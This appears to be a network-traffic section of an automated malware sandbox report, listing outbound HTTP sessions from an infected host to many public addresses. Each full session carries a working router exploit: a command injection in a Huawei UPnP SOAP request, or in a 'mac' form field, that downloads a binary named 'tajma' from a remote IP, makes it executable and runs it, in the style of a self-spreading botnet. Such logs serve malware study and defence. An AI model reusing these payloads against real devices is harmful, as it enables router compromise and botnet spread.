                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1206192.168.2.2338804197.50.175.20637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.546596050 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1207192.168.2.2353848197.35.208.7137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.546736956 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1208192.168.2.2354100157.174.114.1237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.548214912 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1209192.168.2.2336392157.206.227.437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.548217058 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1210192.168.2.2347060133.84.244.1208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.306082010 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1211192.168.2.235260658.139.93.2318080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.306119919 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1212192.168.2.235825240.115.121.1418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.306164026 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1213192.168.2.2358090168.59.254.788080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.308156967 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1214192.168.2.23379884.98.168.1188080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.339976072 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1215192.168.2.2333610205.193.133.68080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.340032101 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1216192.168.2.2339054207.173.191.1718080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.340084076 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1217192.168.2.235440458.243.41.348080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373455048 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1218192.168.2.235086627.164.56.1438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373531103 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1219192.168.2.233680458.144.28.1868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373596907 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1220192.168.2.235099034.140.143.1418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373599052 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1221192.168.2.2359096192.215.251.1488080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373627901 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1222192.168.2.235095665.66.133.1908080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373641968 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
